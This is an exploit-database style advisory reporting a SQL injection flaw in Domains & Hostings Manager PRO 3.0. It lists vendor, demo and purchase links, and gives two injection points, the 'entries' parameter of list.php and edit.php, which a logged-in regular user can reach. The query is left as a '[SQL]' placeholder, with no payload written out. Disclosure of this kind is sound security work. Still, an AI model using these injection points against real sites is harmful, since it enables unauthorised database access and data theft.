# # # # # # Exploit Title: Domains & Hostings Manager PRO v 3.0 - SQL Injection # Google Dork: N/A # Date: 12.02.2017 # Vendor Homepage: http://endavi.com/ # Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735 # Demo: http://endavi.com/dhrpro_demo/ # Version: 3.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # Login as regular user # http://localhost/[PATH]/list.php?entries=[SQL] # http://localhost/[PATH]/edit.php?entries=[SQL] # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-13]